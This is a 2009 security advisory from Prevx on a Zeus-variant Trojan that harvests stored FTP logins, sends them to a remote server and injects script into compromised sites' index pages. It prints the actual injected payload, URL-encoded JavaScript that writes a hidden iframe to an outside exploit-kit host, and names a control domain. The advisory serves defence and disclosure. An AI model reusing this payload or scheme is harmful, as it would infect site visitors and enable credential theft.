On Wednesday the 24th of June, 2009 Prevx detected a new Trojan that is harvesting FTP details from compromised machines. The list of compromised machines is vast, we have seen 66,000 unique FTP server logins from unique domains rising to 74,000 by Friday. The list is now so large we have no way to effectively inform companies in a meaningful timeframe.
What is severity of this infection ?
We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential. It includes a cyclic infection which leverages infected PCs to programmatically modify hi-volume web sites to infect additional users who become part of the cycle. More users leads to more discovery of web site admin credentials which in turn leads to more web sites being modified to serve the infection which leads to more infected users.
What is the infection Vector ?
The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised WebPages contain an injected script that looks something like the example below:
“fr=unescape(’%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e’);var fr=unescape(’%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e’);”
What does the malware do ?
Once installed the malware, which is a variant of the Zeus family, scours the machines stored form cache looking for stored FTP login credentials, then once such logins are found it uses HTTP_POST to send this data to a server located in the Cayman Islands. Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using domain goooodbill.cn This script gives the infected client a url in the format USERNAME:PASSWORD@FTP.ADDRESS.COM, the client then logs in to the given ftp site and modifies all index pages (asp,php,html) and injects the script. Once injected all visitors of the modified domain potentially become part of the infection network/cycle.